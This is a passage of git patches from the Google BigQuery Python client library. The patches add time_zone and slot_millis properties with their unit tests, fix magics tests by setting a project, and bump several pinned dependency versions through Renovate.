googleapis-common-protos==1.70.0 -grpcio==1.73.0 +grpcio==1.73.1 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 From 27ff3a89a5f97305fa3ff673aa9183baa7df200f Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 2 Jul 2025 17:00:39 -0400 Subject: [PATCH 139/202] =?UTF-8?q?fix:=20adds=20magics.context.project=20?= =?UTF-8?q?to=20eliminate=20issues=20with=20unit=20tests=20=E2=80=A6=20(#2?= =?UTF-8?q?228)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds `magics.context.project` to eliminate issues with unit tests in an upcoming PR. Several magics unit tests fail with an error message. If the test does not have knowledge of the project, it attempts to initiate a login sequence to be able to get the project identifier. The login cannot complete because the process is running in an ipython interpreter and pytest does not capture any input. This change provides an explicit reference to a project to avoid that process. ``` Please visit this URL to authorize this application: [REDACTED DUE TO SPACE REASONS] self = <_pytest.capture.DontReadFromInput object at 0x7f55d6821bd0>, size = -1 def read(self, size: int = -1) -> str: > raise OSError( "pytest: reading from stdin while output is captured! Consider using `-s`.") E OSError: pytest: reading from stdin while output is captured! Consider using `-s`. .nox/unit-3-11/lib/python3.11/site-packages/_pytest/capture.py:229: OSError ``` --- tests/unit/test_magics.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tests/unit/test_magics.py b/tests/unit/test_magics.py index 814150693..c79e923f8 100644 --- a/tests/unit/test_magics.py +++ b/tests/unit/test_magics.py @@ -986,6 +986,7 @@ def test_bigquery_magic_dryrun_option_sets_job_config(monkeypatch): google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) @@ -1007,6 +1008,7 @@ def test_bigquery_magic_dryrun_option_returns_query_job(monkeypatch): magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1035,6 +1037,7 @@ def test_bigquery_magic_dryrun_option_variable_error_message( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" ipython_ns_cleanup.append((ip, "q_job")) run_query_patch = mock.patch( @@ -1064,6 +1067,7 @@ def test_bigquery_magic_dryrun_option_saves_query_job_to_variable( magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1098,6 +1102,7 @@ def test_bigquery_magic_saves_query_job_to_variable_on_error( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "project-from-context" ipython_ns_cleanup.append((ip, "result")) client_query_patch = mock.patch( From 7ed9fd293ab1181b5b7b97e7e9ec82aade56e7ef Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 7 Jul 2025 22:52:24 +0200 Subject: [PATCH 140/202] chore(deps): update all dependencies (#2226) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [bigquery-magics](https://redirect.github.com/googleapis/python-bigquery-magics) | `==0.10.0` -> `==0.10.1` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/bigquery-magics/0.10.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/bigquery-magics/0.10.0/0.10.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [bigquery_magics](https://redirect.github.com/googleapis/python-bigquery-magics) | `==0.10.0` -> `==0.10.1` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/bigquery-magics/0.10.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/bigquery-magics/0.10.0/0.10.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [ipython](https://redirect.github.com/ipython/ipython) | `==9.3.0` -> `==9.4.0` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/ipython/9.4.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/ipython/9.3.0/9.4.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [pandas](https://redirect.github.com/pandas-dev/pandas) | `==2.3.0` -> `==2.3.1` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/pandas/2.3.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pandas/2.3.0/2.3.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [pytest-xdist](https://redirect.github.com/pytest-dev/pytest-xdist) ([changelog](https://pytest-xdist.readthedocs.io/en/latest/changelog.html)) | `==3.7.0` -> `==3.8.0` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/pytest-xdist/3.8.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pytest-xdist/3.7.0/3.8.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | | [typing-extensions](https://redirect.github.com/python/typing_extensions) ([changelog](https://redirect.github.com/python/typing_extensions/blob/main/CHANGELOG.md)) | `==4.14.0` -> `==4.14.1` | [![age](https://developer.mend.io/api/mc/badges/age/pypi/typing-extensions/4.14.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/typing-extensions/4.14.0/4.14.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes
googleapis/python-bigquery-magics (bigquery-magics) ### [`v0.10.1`](https://redirect.github.com/googleapis/python-bigquery-magics/blob/HEAD/CHANGELOG.md#0101-2025-07-07) [Compare Source](https://redirect.github.com/googleapis/python-bigquery-magics/compare/v0.10.0...v0.10.1) ##### Dependencies - Move spanner-graph-notebook back to version 1.1.6 ([#​126](https://redirect.github.com/googleapis/python-bigquery-magics/issues/126)) ([17ee695](https://redirect.github.com/googleapis/python-bigquery-magics/commit/17ee6956c8fec740440836609a9106e900b63074))
ipython/ipython (ipython) ### [`v9.4.0`](https://redirect.github.com/ipython/ipython/compare/9.3.0...9.4.0) [Compare Source](https://redirect.github.com/ipython/ipython/compare/9.3.0...9.4.0)
pandas-dev/pandas (pandas) ### [`v2.3.1`](https://redirect.github.com/pandas-dev/pandas/releases/tag/v2.3.1): Pandas 2.3.1 [Compare Source](https://redirect.github.com/pandas-dev/pandas/compare/v2.3.0...v2.3.1) We are pleased to announce the release of pandas 2.3.1. This release includes some improvements and fixes to the future string data type (preview feature for the upcoming pandas 3.0). We recommend that all users upgrade to this version. See the [full whatsnew](https://pandas.pydata.org/pandas-docs/version/2.3.1/whatsnew/v2.3.1.html) for a list of all the changes. Pandas 2.3.1 supports Python 3.9 and higher. The release will be available on the conda-forge channel: ``` conda install pandas --channel conda-forge ``` Or via PyPI: ``` python3 -m pip install --upgrade pandas ``` Please report any issues with the release on the [pandas issue tracker](https://redirect.github.com/pandas-dev/pandas/issues). Thanks to all the contributors who made this release possible.
pytest-dev/pytest-xdist (pytest-xdist) ### [`v3.8.0`](https://redirect.github.com/pytest-dev/pytest-xdist/blob/HEAD/CHANGELOG.rst#pytest-xdist-380-2025-06-30) [Compare Source](https://redirect.github.com/pytest-dev/pytest-xdist/compare/v3.7.0...v3.8.0) \=============================== ## Features - `#​1083 `\_: Add `--no-loadscope-reorder` and `--loadscope-reorder` option to control whether to automatically reorder tests in loadscope for tests where relative ordering matters. This only applies when using `loadscope`. For example, \[test\_file\_1, test\_file\_2, ..., test\_file\_n] are given as input test files, if `--no-loadscope-reorder` is used, for either worker, the `test_file_a` will be executed before `test_file_b` only if `a < b`. The default behavior is to reorder the tests to maximize the number of tests that can be executed in parallel.
python/typing_extensions (typing-extensions) ### [`v4.14.1`](https://redirect.github.com/python/typing_extensions/blob/HEAD/CHANGELOG.md#Release-4141-July-4-2025) [Compare Source](https://redirect.github.com/python/typing_extensions/compare/4.14.0...4.14.1) - Fix usage of `typing_extensions.TypedDict` nested inside other types (e.g., `typing.Type[typing_extensions.TypedDict]`). This is not allowed by the type system but worked on older versions, so we maintain support.
--- ### Configuration πŸ“… **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. β™» **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. πŸ‘» **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 4 ++-- samples/magics/requirements-test.txt | 2 +- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 6 +++--- samples/snippets/requirements-test.txt | 2 +- 8 files changed, 12 insertions(+), 12 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index b3046227c..3bf52c85d 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index ee895a4f4..d449b373b 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 68f6c1662..5b342fe5c 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -24,7 +24,7 @@ idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 -pandas==2.3.0 +pandas==2.3.1 proto-plus==1.26.1 pyarrow==20.0.0 pyasn1==0.6.1 @@ -39,6 +39,6 @@ rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.1; python_version >= '3.10' six==1.17.0 -typing-extensions==4.14.0 +typing-extensions==4.14.1 typing-inspect==0.9.0 urllib3==2.5.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index b3046227c..3bf52c85d 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index d2456fc5a..b53a35982 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.10.0 +bigquery_magics==0.10.1 db-dtypes==1.4.3 google.cloud.bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 -pandas==2.3.0 +pandas==2.3.1 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index b3046227c..3bf52c85d 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 66409e49d..4b134ac9d 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,9 +1,9 @@ -bigquery-magics==0.10.0 +bigquery-magics==0.10.1 db-dtypes==1.4.3 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' -ipython==9.3.0; python_version >= '3.10' +ipython==9.4.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.3; python_version >= '3.10' -pandas==2.3.0 +pandas==2.3.1 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index d71018b3f..cef3450e1 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -2,4 +2,4 @@ google-cloud-testutils==1.6.4 pytest==8.4.1 mock==5.2.0 -pytest-xdist==3.7.0 +pytest-xdist==3.8.0 From b2300d032843512b7e4a5703377632fe60ef3f8d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 9 Jul 2025 19:12:23 -0400 Subject: [PATCH 141/202] feat: adds time_zone to external config and load job (#2229) This commit introduces new configuration options for BigQuery load jobs and external table definitions, aligning with recent updates to the underlying protos. New options added: `time_zone`: Time zone used when parsing timestamp values that do not have specific time zone information. (Applies to `LoadJobConfig`, `LoadJob`, and `ExternalConfig`) Changes include: Added corresponding properties (getters/setters) to `LoadJobConfig`, `LoadJob`, and `ExternalConfig`. Updated docstrings and type hints for all new attributes. Updated unit tests to cover the new options, ensuring they are correctly handled during object initialization, serialization to API representation, and deserialization from API responses. --- google/cloud/bigquery/external_config.py | 17 +++ google/cloud/bigquery/job/load.py | 21 ++++ tests/unit/job/test_load.py | 32 ++++++ tests/unit/job/test_load_config.py | 127 +++++++++++++++++++++++ tests/unit/test_external_config.py | 7 ++ 5 files changed, 204 insertions(+) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index cb8141cd0..fcfcaca20 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -848,6 +848,23 @@ def schema(self, value): prop = {"fields": [field.to_api_repr() for field in value]} self._properties["schema"] = prop + @property + def time_zone(self) -> Optional[str]: + """Optional[str]: Time zone used when parsing timestamp values that do not + have specific time zone information (e.g. 2024-04-20 12:34:56). The expected + format is an IANA timezone string (e.g. America/Los_Angeles). + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.time_zone + """ + + result = self._properties.get("timeZone") + return typing.cast(str, result) + + @time_zone.setter + def time_zone(self, value: Optional[str]): + self._properties["timeZone"] = value + @property def connection_id(self): """Optional[str]: [Experimental] ID of a BigQuery Connection API diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index e56ce16f0..5d49aef18 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -548,6 +548,20 @@ def source_format(self): def source_format(self, value): self._set_sub_prop("sourceFormat", value) + @property + def time_zone(self) -> Optional[str]: + """Optional[str]: Default time zone that will apply when parsing timestamp + values that have no specific time zone. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.time_zone + """ + return self._get_sub_prop("timeZone") + + @time_zone.setter + def time_zone(self, value: Optional[str]): + self._set_sub_prop("timeZone", value) + @property def time_partitioning(self): """Optional[google.cloud.bigquery.table.TimePartitioning]: Specifies time-based @@ -889,6 +903,13 @@ def clustering_fields(self): """ return self.configuration.clustering_fields + @property + def time_zone(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.time_zone`. + """ + return self.configuration.time_zone + @property def schema_update_options(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 10df46fb3..81d8e44b4 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -38,10 +38,14 @@ def _setUpConstants(self): self.OUTPUT_ROWS = 345 self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" + self.TIME_ZONE = "UTC" + def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) config = resource["configuration"]["load"] config["sourceUris"] = [self.SOURCE1] + + config["timeZone"] = self.TIME_ZONE config["destinationTable"] = { "projectId": self.PROJECT, "datasetId": self.DS_ID, @@ -152,6 +156,10 @@ def _verifyResourceProperties(self, job, resource): ) else: self.assertIsNone(job.destination_encryption_configuration) + if "timeZone" in config: + self.assertEqual(job.time_zone, config["timeZone"]) + else: + self.assertIsNone(job.time_zone) def test_ctor(self): client = _make_client(project=self.PROJECT) @@ -195,6 +203,8 @@ def test_ctor(self): self.assertIsNone(job.schema_update_options) self.assertIsNone(job.reference_file_schema_uri) + self.assertIsNone(job.time_zone) + def test_ctor_w_config(self): from google.cloud.bigquery.schema import SchemaField from google.cloud.bigquery.job import LoadJobConfig @@ -431,6 +441,24 @@ def test_from_api_repr_w_properties(self): self.assertIs(job._client, client) self._verifyResourceProperties(job, RESOURCE) + def test_to_api_repr(self): + self._setUpConstants() + client = _make_client(project=self.PROJECT) + RESOURCE = self._make_resource(ended=False) + + klass = self._get_target_class() + job = klass.from_api_repr(RESOURCE, client) + api_repr = job.to_api_repr() + + # as per the documentation in load.py -> LoadJob.to_api_repr(), + # the return value from to_api_repr should not include statistics + expected = { + "jobReference": RESOURCE["jobReference"], + "configuration": RESOURCE["configuration"], + } + + self.assertEqual(api_repr, expected) + def test_begin_w_already_running(self): conn = make_connection() client = _make_client(project=self.PROJECT, connection=conn) @@ -571,6 +599,7 @@ def test_begin_w_alternate_client(self): ] }, "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], + "timeZone": self.TIME_ZONE, } RESOURCE["configuration"]["load"] = LOAD_CONFIGURATION conn1 = make_connection() @@ -599,6 +628,9 @@ def test_begin_w_alternate_client(self): config.write_disposition = WriteDisposition.WRITE_TRUNCATE config.schema_update_options = [SchemaUpdateOption.ALLOW_FIELD_ADDITION] config.reference_file_schema_uri = "gs://path/to/reference" + + config.time_zone = self.TIME_ZONE + with mock.patch( "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" ) as final_attributes: diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 3a681c476..6424f7e68 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -828,6 +828,22 @@ def test_write_disposition_setter(self): config._properties["load"]["writeDisposition"], write_disposition ) + def test_time_zone_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.time_zone) + + def test_time_zone_hit(self): + time_zone = "UTC" + config = self._get_target_class()() + config._properties["load"]["timeZone"] = time_zone + self.assertEqual(config.time_zone, time_zone) + + def test_time_zone_setter(self): + time_zone = "America/New_York" + config = self._get_target_class()() + config.time_zone = time_zone + self.assertEqual(config._properties["load"]["timeZone"], time_zone) + def test_parquet_options_missing(self): config = self._get_target_class()() self.assertIsNone(config.parquet_options) @@ -901,3 +917,114 @@ def test_column_name_character_map_none(self): config._properties["load"]["columnNameCharacterMap"], ColumnNameCharacterMap.COLUMN_NAME_CHARACTER_MAP_UNSPECIFIED, ) + + RESOURCE = { + "load": { + "allowJaggedRows": True, + "createDisposition": "CREATE_NEVER", + "encoding": "UTF-8", + "fieldDelimiter": ",", + "ignoreUnknownValues": True, + "maxBadRecords": 10, + "nullMarker": "\\N", + "quote": '"', + "schema": { + "fields": [ + {"name": "name", "type": "STRING", "mode": "NULLABLE"}, + {"name": "age", "type": "INTEGER", "mode": "NULLABLE"}, + ] + }, + "skipLeadingRows": "1", + "sourceFormat": "CSV", + "timePartitioning": { + "type": "DAY", + "field": "transaction_date", + }, + "useAvroLogicalTypes": True, + "writeDisposition": "WRITE_TRUNCATE", + "timeZone": "America/New_York", + "parquetOptions": {"enableListInference": True}, + "columnNameCharacterMap": "V2", + "someNewField": "some-value", + } + } + + def test_from_api_repr(self): + from google.cloud.bigquery.job import ( + CreateDisposition, + LoadJobConfig, + SourceFormat, + WriteDisposition, + ) + from google.cloud.bigquery.schema import SchemaField + from google.cloud.bigquery.table import TimePartitioning, TimePartitioningType + + from google.cloud.bigquery.job.load import ColumnNameCharacterMap + + config = LoadJobConfig.from_api_repr(self.RESOURCE) + + self.assertTrue(config.allow_jagged_rows) + self.assertEqual(config.create_disposition, CreateDisposition.CREATE_NEVER) + self.assertEqual(config.encoding, "UTF-8") + self.assertEqual(config.field_delimiter, ",") + self.assertTrue(config.ignore_unknown_values) + self.assertEqual(config.max_bad_records, 10) + self.assertEqual(config.null_marker, "\\N") + self.assertEqual(config.quote_character, '"') + self.assertEqual( + config.schema, + [SchemaField("name", "STRING"), SchemaField("age", "INTEGER")], + ) + self.assertEqual(config.skip_leading_rows, 1) + self.assertEqual(config.source_format, SourceFormat.CSV) + self.assertEqual( + config.time_partitioning, + TimePartitioning(type_=TimePartitioningType.DAY, field="transaction_date"), + ) + self.assertTrue(config.use_avro_logical_types) + self.assertEqual(config.write_disposition, WriteDisposition.WRITE_TRUNCATE) + self.assertEqual(config.time_zone, "America/New_York") + self.assertTrue(config.parquet_options.enable_list_inference) + self.assertEqual(config.column_name_character_map, ColumnNameCharacterMap.V2) + self.assertEqual(config._properties["load"]["someNewField"], "some-value") + + def test_to_api_repr(self): + from google.cloud.bigquery.job import ( + CreateDisposition, + LoadJobConfig, + SourceFormat, + WriteDisposition, + ) + from google.cloud.bigquery.schema import SchemaField + from google.cloud.bigquery.table import TimePartitioning, TimePartitioningType + from google.cloud.bigquery.format_options import ParquetOptions + from google.cloud.bigquery.job.load import ColumnNameCharacterMap + + config = LoadJobConfig() + config.allow_jagged_rows = True + config.create_disposition = CreateDisposition.CREATE_NEVER + config.encoding = "UTF-8" + config.field_delimiter = "," + config.ignore_unknown_values = True + config.max_bad_records = 10 + config.null_marker = r"\N" + config.quote_character = '"' + config.schema = [SchemaField("name", "STRING"), SchemaField("age", "INTEGER")] + config.skip_leading_rows = 1 + config.source_format = SourceFormat.CSV + config.time_partitioning = TimePartitioning( + type_=TimePartitioningType.DAY, field="transaction_date" + ) + config.use_avro_logical_types = True + config.write_disposition = WriteDisposition.WRITE_TRUNCATE + config.time_zone = "America/New_York" + parquet_options = ParquetOptions() + parquet_options.enable_list_inference = True + config.parquet_options = parquet_options + config.column_name_character_map = ColumnNameCharacterMap.V2 + config._properties["load"]["someNewField"] = "some-value" + + api_repr = config.to_api_repr() + + expected = self.RESOURCE + self.assertEqual(api_repr, expected) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 7f84a9f5b..a89b7a1fb 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -26,6 +26,8 @@ class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] + TIME_ZONE = "America/Los_Angeles" + BASE_RESOURCE = { "sourceFormat": "", "sourceUris": SOURCE_URIS, @@ -33,6 +35,7 @@ class TestExternalConfig(unittest.TestCase): "autodetect": True, "ignoreUnknownValues": False, "compression": "compression", + "timeZone": TIME_ZONE, } def test_from_api_repr_base(self): @@ -79,6 +82,7 @@ def test_to_api_repr_base(self): ec.connection_id = "path/to/connection" ec.schema = [schema.SchemaField("full_name", "STRING", mode="REQUIRED")] + ec.time_zone = self.TIME_ZONE exp_schema = { "fields": [{"name": "full_name", "type": "STRING", "mode": "REQUIRED"}] } @@ -92,6 +96,7 @@ def test_to_api_repr_base(self): "compression": "compression", "connectionId": "path/to/connection", "schema": exp_schema, + "timeZone": self.TIME_ZONE, } self.assertEqual(got_resource, exp_resource) @@ -128,6 +133,8 @@ def _verify_base(self, ec): self.assertEqual(ec.max_bad_records, 17) self.assertEqual(ec.source_uris, self.SOURCE_URIS) + self.assertEqual(ec.time_zone, self.TIME_ZONE) + def test_to_api_repr_source_format(self): ec = external_config.ExternalConfig("CSV") got = ec.to_api_repr() From 3ed0a0a3d9699f1f70a616cfd06d1958b69e1f03 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 10 Jul 2025 19:44:58 +0200 Subject: [PATCH 142/202] chore(deps): update dependency certifi to v2025.7.9 (#2232) Co-authored-by: Chalmer Lowe --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 5b342fe5c..447e92c81 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ attrs==25.3.0 -certifi==2025.6.15 +certifi==2025.7.9 cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' From d44bf0231e6e96369e4e03667a3f96618fb664e2 Mon Sep 17 00:00:00 2001 From: Huan Chen <142538604+Genesis929@users.noreply.github.com> Date: Fri, 11 Jul 2025 10:10:58 -0700 Subject: [PATCH 143/202] feat: add total slot ms to RowIterator (#2233) * feat: add total slot ms to RowIterator * format fix --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/_job_helpers.py | 1 + google/cloud/bigquery/client.py | 4 ++++ google/cloud/bigquery/job/query.py | 1 + google/cloud/bigquery/query.py | 14 ++++++++++++++ google/cloud/bigquery/table.py | 7 +++++++ tests/unit/job/test_query.py | 2 ++ tests/unit/test_client.py | 2 ++ tests/unit/test_query.py | 16 ++++++++++++++++ 8 files changed, 47 insertions(+) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 888dc1e73..73d4f6e7b 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -560,6 +560,7 @@ def do_query(): num_dml_affected_rows=query_results.num_dml_affected_rows, query=query, total_bytes_processed=query_results.total_bytes_processed, + slot_millis=query_results.slot_millis, ) if job_retry is not None: diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 811e9ef03..804f77ea2 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -4144,6 +4144,7 @@ def _list_rows_from_query_results( num_dml_affected_rows: Optional[int] = None, query: Optional[str] = None, total_bytes_processed: Optional[int] = None, + slot_millis: Optional[int] = None, ) -> RowIterator: """List the rows of a completed query. See @@ -4195,6 +4196,8 @@ def _list_rows_from_query_results( The query text used. total_bytes_processed (Optional[int]): total bytes processed from job statistics, if present. + slot_millis (Optional[int]): + Number of slot ms the user is actually billed for. Returns: google.cloud.bigquery.table.RowIterator: @@ -4234,6 +4237,7 @@ def _list_rows_from_query_results( num_dml_affected_rows=num_dml_affected_rows, query=query, total_bytes_processed=total_bytes_processed, + slot_millis=slot_millis, ) return row_iterator diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 4d95f0e71..ec9379ea9 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1766,6 +1766,7 @@ def is_job_done(): num_dml_affected_rows=self._query_results.num_dml_affected_rows, query=self.query, total_bytes_processed=self.total_bytes_processed, + slot_millis=self.slot_millis, **list_rows_kwargs, ) rows._preserve_order = _contains_order_by(self.query) diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index 8745c09f5..4a006d621 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -1282,6 +1282,20 @@ def total_bytes_processed(self): if total_bytes_processed is not None: return int(total_bytes_processed) + @property + def slot_millis(self): + """Total number of slot ms the user is actually billed for. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.slot_millis + + Returns: + Optional[int]: Count generated on the server (None until set by the server). + """ + slot_millis = self._properties.get("totalSlotMs") + if slot_millis is not None: + return int(slot_millis) + @property def num_dml_affected_rows(self): """Total number of rows affected by a DML query. diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 861f806b4..dbdde36d1 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1812,6 +1812,7 @@ def __init__( num_dml_affected_rows: Optional[int] = None, query: Optional[str] = None, total_bytes_processed: Optional[int] = None, + slot_millis: Optional[int] = None, ): super(RowIterator, self).__init__( client, @@ -1841,6 +1842,7 @@ def __init__( self._num_dml_affected_rows = num_dml_affected_rows self._query = query self._total_bytes_processed = total_bytes_processed + self._slot_millis = slot_millis @property def _billing_project(self) -> Optional[str]: @@ -1898,6 +1900,11 @@ def total_bytes_processed(self) -> Optional[int]: """total bytes processed from job statistics, if present.""" return self._total_bytes_processed + @property + def slot_millis(self) -> Optional[int]: + """Number of slot ms the user is actually billed for.""" + return self._slot_millis + def _is_almost_completely_cached(self): """Check if all results are completely cached. diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 46b802aa3..7201adb55 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -888,6 +888,7 @@ def test_result_reloads_job_state_until_done(self): job_resource = self._make_resource(started=True, location="EU") job_resource_done = self._make_resource(started=True, ended=True, location="EU") job_resource_done["statistics"]["query"]["totalBytesProcessed"] = str(1234) + job_resource_done["statistics"]["query"]["totalSlotMs"] = str(5678) job_resource_done["configuration"]["query"]["destinationTable"] = { "projectId": "dest-project", "datasetId": "dest_dataset", @@ -969,6 +970,7 @@ def test_result_reloads_job_state_until_done(self): self.assertEqual(result.total_rows, 1) self.assertEqual(result.query, job.query) self.assertEqual(result.total_bytes_processed, 1234) + self.assertEqual(result.slot_millis, 5678) query_results_path = f"/projects/{self.PROJECT}/queries/{self.JOB_ID}" query_results_call = mock.call( diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 42bfc84b9..bb86ccc3c 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -5718,6 +5718,7 @@ def test_query_and_wait_defaults(self): "rows": [{"f": [{"v": "5552452"}]}], "queryId": "job_abcDEF_", "totalBytesProcessed": 1234, + "totalSlotMs": 5678, } creds = 